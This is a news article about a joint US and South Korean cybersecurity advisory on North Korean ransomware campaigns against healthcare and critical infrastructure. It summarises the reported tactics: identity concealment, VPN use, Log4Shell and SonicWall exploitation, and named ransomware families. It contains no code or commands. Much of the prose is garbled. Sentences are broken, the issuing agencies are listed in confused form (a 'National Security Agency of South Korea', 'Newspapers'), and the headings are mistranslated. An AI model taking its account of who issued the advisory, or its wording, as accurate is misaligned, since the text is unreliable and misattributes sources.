Government agencies from the United States and South Korea are highlighting new ransomware tactics they have seen, which they say are used to conceal the affiliation of North Korean hackers. are working to carry out attacks against US and Korean healthcare institutions and critical infrastructure.
WHY IT IMPORTANT
New Cybersecurity Advisory, Ransomware Attacks on Critical Infrastructure Funds North Korea’s Malicious Cyber Operations, details the tactics, techniques, and procedures observed North Korea’s recent history and history as well as indicators of compromise.
According to the U.S. National Security Agency, the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, and the Department of Health and Human Services, along with the National Security Agency of South Korea, the National Security Agency said. Newspapers and the ROK’s National Security Agency issued the warning yesterday.
“In some cases, DPRK actors have portrayed themselves as other ransomware groups, such as the REvil ransomware group,” according to the agencies.
Agencies from both countries say that an unspecified amount of revenue from cryptocurrency ransoms supports North Korean government cyber operations targeting the U.S. and South Korean governments, including those defense information network.
Notably, North Korean cyber actors could threaten to disclose the proprietary data of a private healthcare company to competitors if the ransom is not paid.
The CSA provides the following key technical details and shares mitigation strategies:
- Get the infrastructure – DPRK actors create domains, individuals and accounts, and identify crypto services to conduct their ransomware activities. Agents buy infrastructure, IP addresses, and domains with cryptocurrency created through illegal cybercrime, such as ransomware and crypto theft.
- Confusing identity – North Korean actors knowingly conceal their involvement by operating with or under the identity of a third-party foreign affiliate and using a third-party foreign intermediary to receive ransom.
- Buy VPN and VPS – North Korean cyber actors will also use virtual private networks and virtual private servers or third country IP addresses to appear to come from innocuous locations rather than from North Korea.
- Gain access – Actors use different exploits for common vulnerabilities and exposures to gain access and escalate privileges on the network. Recently observed CVEs that actors use to gain access include remote code execution in the Apache Log4j software library (called Log4Shell) and remote code execution in other SonicWall devices together.
- Scroll sideways and explore – After initial access, DPRK cyber attackers use staged payload with custom malware to perform additional reconnaissance, upload and download files and executables . The staged malware is also responsible for collecting victim information and sending it to a remote server controlled by the actors.
- Using different ransomware tools – Actors have used privately developed ransomware, such as Maui and H0lyGh0st, and have also been observed using or possessing publicly available encryption tools, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk and Your Ransom.
- Request a ransom in cryptocurrency – DPRK cyber actors have been observed placing ransoms in bitcoin and are known to communicate with victims through the Proton Mail email account.
TREND TO BIGGER
In July, the CISA, the FBI, and the Treasury Department issued a CSA warning that Maui malware was being used to target hospitals and public health agencies.
Officials later said: “Since May 2021, the FBI has observed and responded to multiple Maui ransomware incidents at HPH Sector organizations.”
“North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services – including an electrical health record service electronics, diagnostic services, imaging services, and intranet services.”
Whether it’s an independent or state-sponsored cybercriminal willing to jump from one ransomware group to another, a hospital’s financial ratings are vulnerable, according to a recent Fitch Ratings assessment. .
Fitch analysts say the deployment of sophisticated cyber weapons that compromise healthcare delivery could affect a hospital’s financial record and “could have a negative impact” to ratings”.
ON PROFILE
“This CSA complements previous reports of malicious network agent activities
related to the DPRK’s ransomware campaigns, specifically Maui and the H0lyGh0st ransomware,” the agencies said in the warning.
Andrea Fox is the senior editor of Healthcare IT News.
Email: [email protected]
Healthcare IT News is a publication of HIMSS Media.
